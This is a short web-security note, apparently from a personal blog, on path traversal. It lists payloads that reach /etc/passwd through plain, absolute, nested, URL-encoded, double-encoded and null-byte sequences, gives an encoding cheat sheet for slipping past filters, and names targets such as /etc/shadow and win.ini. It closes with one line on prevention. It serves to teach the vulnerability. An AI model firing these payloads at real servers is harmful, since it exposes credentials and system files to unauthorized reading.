Path Traversal - pad1ryoshi

240 words

1 minute

Path Traversal

2025-05-15

WebSec

path-traversal

/

web-vulns

Path traversal, also known as directory traversal, is a vulnerability that allows an attacker to read arbitrary files on the server where the application is hosted. Reading can include:

1
- Application data and code
2
- Credentials of back-end systems
3
- Sensitive operating system files

In some cases the attacker may also be able to write arbitrary files to the server.

Where to look?#

Every time a resource or file is included by the application, there is a risk that an attacker could include a remote file or resource in an unauthorized way.

Examples#

1
https://insecure-vulnerable-website.com/loadFile?filename=
2

3
Simple case:
4
    ?filename=../../../etc/passwd
5

6
Absolute path:
7
    ?filename=/etc/passwd
8

9
Nested traversal sequences:
10
    ?filename=....//....//....//etc/passwd
11

12
Url encoding:
13
    ?filename=..%2f..%2f..%2fetc/passwd
14

15
Double URL encoding:
16
    ?filename=..%252f..%252f..%252fetc/passwd
17

18
Base folder followed by traversal sequences:
19
    ?filename=/var/www/images/../../../etc/passwd
20

21
Null byte bypass:
22
    ?filename=../../../etc/passwd%00.png

Encoding, double encoding and percent encoding#

Tips
Diff types to encode

1
%2e%2e%2f -> ../
2
%2e%2e/ -> ../
3
..%2f -> ../
4
%2e%2e%5c -> ..\
5
%2e%2e\ -> ..\
6
..%5c -> ..\
7
%252e%252e%255c -> ..\
8
..%255c -> ..\
9

10
..%c0%af -> ../
11
..%c1%9c -> ..\
12

13
%252%66 -> %2f -> /
14
%252%65 -> %2e -> .
15
%252f -> %2f -> /
16
%252e -> %2e -> .

Files to read#

Linux Files:

/etc/passwd
/etc/hosts
/etc/shadow

Windows Files:

C:/boot.ini
C:/Windows/win.ini
C:/WINNT/win.ini

How to prevent PATH TRAVERSAL#

The most effective way to prevent path traversal vulnerabilities is to avoid passing user-supplied input to filesystem APIs altogether. Many application functions that do this can be rewritten to deliver the same behavior in a safer way.